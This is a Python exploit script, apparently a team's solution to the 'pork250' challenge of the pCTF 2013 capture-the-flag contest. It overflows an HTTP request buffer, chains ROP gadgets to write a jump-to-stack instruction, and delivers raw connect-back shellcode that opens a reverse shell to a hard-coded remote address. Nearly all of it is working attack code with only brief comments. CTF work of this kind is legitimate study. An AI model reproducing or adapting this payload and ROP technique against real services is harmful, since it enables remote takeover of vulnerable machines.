## pCTF 2013 ## pork250 ## mak - DragonSector #!/usr/bin/env python2 import socket,time from struct import * #host = "localhost" host = "54.235.20.205" junk = "A"*4 ## modified connect back shellcode2 = ( "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59" "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x5b\xe4\xc6\x61\x66\x68" "\x1f\x90\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd" "\x80\x52\x68\x30\x30\x73\x68\x89\xe6\xfe\x0e\xfe\x4c\x24\x01" "\x68\x30\x62\x69\x6e\x89\xe6\xfe\x0e\x89\xe3\x52\x53" "\x89\xe1\xb0\x0e\xfe\xc8\xfe\xc8\xfe\xc8\xcd\x80" ) ## write jmp esp @ 0x804ab72 rop = pack('I',0x08049346) # pop ebx ; pop ebx ; ret rop += pack('I',0x0B8A0008 + 0x80484af) # [shif - ptr] == 0xe500 rop += junk rop += pack('I',0x080499ce) #add eax, dword [ebx-0x0B8A0008] ; add esp, 0x04 ; pop ebx ; pop ebp ; ret rop += junk*3 rop += pack('I',0x08049346) # pop ebx ; pop ebx ; ret rop += pack('i',0x804ab72-0x5D5B04C4) # [shif - ptr] == 0xffff0000 rop += junk rop += pack('I',0x08048b3e) # add dword [ebx+0x5D5B04C4], eax ; ret rop += pack('I',0x804ab72) print "Shellcode lenght: %d" % len(shellcode2) x = "GET http://" x += "A"*0x400 x += pack('I',0x080499a2) # fix esp x +=("A"*4) + pack('I',0x0804a010) *2 x += "A"*32 #pack('I',0x804884a) *8 # ret nop x += rop x += shellcode2 x += " H\r\n" s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((host,33227)) print "concectd to: %s" % host s.send(x) print "payload sended" time.sleep(1) s.send("\r\n"*100) time.sleep(10) #s.send(("A"*0x600) + ' http://asdf ' + "B"*0x100) #print s.recv(0x1000)